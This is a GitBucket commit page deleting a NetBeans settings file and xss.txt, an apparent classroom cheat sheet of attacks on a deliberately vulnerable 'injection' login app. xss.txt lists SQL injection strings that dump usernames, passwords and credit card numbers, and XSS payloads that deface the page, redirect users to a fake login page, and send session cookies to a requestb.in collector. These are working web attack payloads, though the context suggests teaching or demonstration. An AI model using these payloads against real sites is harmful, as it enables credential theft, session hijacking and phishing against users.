GitBucket
4.21.2
Toggle navigation
Snippets
Sign in
Files
Branches
1
Releases
Issues
Pull requests
Labels
Priorities
Milestones
Wiki
Forks
mark.george
/
jetty
Browse code
Clean some rubbish.
master
1 parent
320b519
commit
b7d28b16ad28c225f60ee8b41cb0944bfa433854
Mark George
authored
on 21 Feb 2019
Patch
Showing
2 changed files
nbproject/private/private.xml
xss.txt
Show notes
View
nbproject/private/private.xml
100644 → 0
<?xml version="1.0" encoding="UTF-8"?> <project-private xmlns="http://www.netbeans.org/ns/project-private/1"> <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/1"/> <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/> <open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2"> <group> <file>file:/home/mark/work/projects/injection/src/java/servlets/LoginServlet.java</file> <file>file:/home/mark/work/projects/injection/web/awesome_login.jsp</file> </group> </open-files> </project-private>
Show notes
View
xss.txt
100644 → 0
http://139.80.81.78:8080/injection/ // basic injection ' or 1=1;-- // get admin's credentials 'or 1=1 union select 'WOOHOO!' from users order by name desc; -- // get entire users table 'or 1=1 union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name order by name desc; -- // change color food<script>document.body.style.backgroundColor='#FF0000'</script> // change back button food<br/><a href="https://i.chzbgr.com/maxW500/4554986496/hF3327748/">Back</a><!-- // fake login <script>alert('Session timed out. Please log in to continue.');window.location='http://139.80.81.78:8080/injection/herephishyphishy.jsp'</script> // display cookies <script>alert(document.cookie)</script> // send cookies to request.bin <script>window.location='https://requestb.in/1jledlk1?'+document.cookie</script> // setting cookie via console document.cookie = "JSESSIONID=?"
Show line notes below